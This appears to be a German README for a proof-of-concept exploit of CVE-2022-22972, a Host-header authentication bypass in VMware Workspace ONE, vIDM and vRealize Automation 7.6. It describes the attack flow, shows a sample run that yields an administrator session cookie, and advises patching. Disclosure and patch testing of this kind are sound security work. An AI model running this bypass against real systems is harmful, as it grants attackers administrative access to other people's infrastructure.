
Proof-of-concept-Exploit für CVE-2022-22972, der die Authentifizierung in VMware Workspace ONE, vIDM und vRealize Automation 7.6 über Host-Header-Manipulation umgeht.
POC für CVE-2022-22972, das VMware Workspace ONE, vIDM und vRealize Automation 7.6 betrifft.
Eine technische Grundursachenanalyse der Schwachstelle finden Sie in unserem Blog: https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive
Dieses Skript kann verwendet werden, um die Authentifizierung bei vRealize Automation 7.6 unter Verwendung von CVE-2022-22972 zu umgehen. Workspace ONE und vIDM haben unterschiedliche Authentifizierungsendpunkte, aber der Kern der Schwachstelle bleibt derselbe. Wir freuen uns über Pull-Requests, falls Sie Testartikel haben, um den Ablauf zu verifizieren.
Dieses Skript funktioniert, indem es den Host-Header einer HTTP-POST-Anfrage eines VMware-Authentifizierungsendpunkts auf einen vom Angreifer kontrollierten Host ändert. Dadurch wird die VMware-Anwendung veranlasst, sich mit Anmeldeinformationen an den Host zu wenden, und wenn der Host 200 zurückgibt, wird der Benutzer erfolgreich authentifiziert.
Dieses Skript erzeugt ein HZN-Cookie, das in späteren Anfragen verwendet werden kann, um Aktionen als der kompromittierte Benutzer auszuführen.
HINWEIS: Die Standardargumente des Skripts senden die Authentifizierungsanfrage an unser AWS-API-Gateway, das so konfiguriert ist, dass es für den im Blog erwähnten spezifischen Endpunkt mit 200 antwortet. Sie können dies mit der Option --host ändern. Dieser Endpunkt empfängt während des Exploit-Ablaufs keine sensiblen Daten - nur eine Anfrage von der anfälligen Anwendung mit dem gefälschten Authentifizierungs-Header, auf die er antwortet.
dev@ubuntu:~/vmware/vra/exploit$ python3 CVE-2022-22972.py https://vra-app01.vra.intranet
Extracting state from vcac redirects...
Sending POST to auth endpoint
HZN=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJqdGkiOiJiM2E3MDJiOS01NjJkLTQwODgtYTg2Ny0xZjY5ZWE4YjAyZjMiLCJwcm4iOiJhZG1pbmlzdHJhdG9yQFZTUEhFUkUuTE9DQUwiLCJkb21haW4iOiJ2c3BoZXJlLmxvY2FsIiwidXNlcl9pZCI6IjMiLCJhdXRoX3RpbWUiOjE2NTM0MjUwOTAsImlzcyI6Imh0dHBzOi8vZWkzd3B0OTEwMC5leGVjdXRlLWFwaS51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9TQUFTL3QvdnNwaGVyZS5sb2NhbC9hdXRoIiwiYXVkIjoiaHR0cHM6Ly9laTN3cHQ5MTAwLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMi5hbWF6b25hd3MuY29tL1NBQVMvdC92c3BoZXJlLmxvY2FsL2F1dGgvb2F1dGh0b2tlbiIsImN0eCI6Ilt7XCJtdGRcIjpcInVybjp2bXdhcmU6bmFtZXM6YWM6Y2xhc3NlczpMb2NhbFBhc3N3b3JkQXV0aFwiLFwiaWF0XCI6MTY1MzQyNTA5MCxcImlkXCI6M31dIiwic2NwIjoicHJvZmlsZSBhZG1pbiB1c2VyIGVtYWlsIG9wZXJhdG9yIiwiaWRwIjoiMiIsImVtbCI6ImFkbWluaXN0cmF0b3JAdnJhLWFwcDAxLnZyYS5pbnRyYW5ldCIsImNpZCI6IiIsImRpZCI6IiIsIndpZCI6IiIsInJ1bGVzIjp7ImV4cGlyeSI6MTY1MzQyNjg5MCwicnVsZXMiOlt7InJlc291cmNlcyI6WyIqIl0sImFjdGlvbnMiOlsiKiJdLCJjb25kaXRpb25zIjpudWxsfV0sImxpbmsiOm51bGx9LCJleHAiOjE2NTM0MjY4OTAsImlhdCI6MTY1MzQyNTA5MCwic3ViIjoiYWQzODkzODEtNTRmNS00ODFkLWFmNWEtOWZjNmIzOGI0NzQ0IiwicHJuX3R5cGUiOiJVU0VSIn0.Kkq2UnmqpW6yJb3GGCp7dSXc5PlU1y8YyDULIYLHIvYlB3OC4j5xFDy91a2tk4bi1lAUITymV-NUgweoCl15LXFVfBFYLEs-OAvMLKZhhGnFF-BrxmyYLPJutkxsi-gL0rF4VmYykuYw9tdUY2DghWiGGZ6QTYOts21QUzcvU-8
Set the HZN cookie in your browser to bypass authentication
Aktualisieren Sie auf die neueste Version oder ergreifen Sie Gegenmaßnahmen gemäß den Anweisungen in der VMSA
Diese Software wurde ausschließlich für akademische Forschungszwecke und für die Entwicklung effektiver Verteidigungstechniken entwickelt und ist nicht dazu gedacht, Systeme anzugreifen, sofern nicht ausdrücklich autorisiert. Projektbetreuer sind nicht verantwortlich oder haftbar für Missbrauch der Software. Verwenden Sie sie verantwortungsvoll.